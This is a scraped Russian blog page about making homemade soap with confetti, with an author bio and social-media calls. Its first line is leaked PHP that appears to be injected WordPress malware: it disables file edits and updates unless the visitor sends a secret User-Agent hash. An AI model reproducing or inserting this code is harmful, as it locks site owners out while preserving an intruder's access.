if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Видео, как сделать своими руками мыльное конфетти | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Видео, как сделать своими руками мыльное конфетти

Ностальгия подтолкнула меня сделать для своей дочки натуральное домашнее мыло с конфетти! И, конечно же, спешу поделиться со всеми моими подружками как сделать это чудесное мыльце!

Дев­чон­ки, сего­дня на меня напа­ли вос­по­ми­на­ния. Сиде­ла, смот­ре­ла в окно, а перед гла­за­ми про­ле­та­ли дет­ство, новый год, празд­ни­ки и мое одно из самых люби­мых раз­вле­че­ний — наре­зать, а потом раз­бра­сы­вать кон­фет­ти! Это ведь было так весе­ло — тогда мне не нуж­но было уби­рать всю квар­ти­ру и доста­вать эти малень­кие круг­лень­кие бума­жеч­ки из всех щелей 😉

И вот носталь­гия под­толк­ну­ла меня сде­лать для сво­ей доч­ки нату­раль­ное домаш­нее мыло с кон­фет­ти! Оза­да­чи­лась я этим вопро­сом и на выруч­ку мне при­шел мой люби­мый youtube. И, конеч­но же, спе­шу поде­лить­ся со все­ми мои­ми подруж­ка­ми как сде­лать это чудес­ное мыльце!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!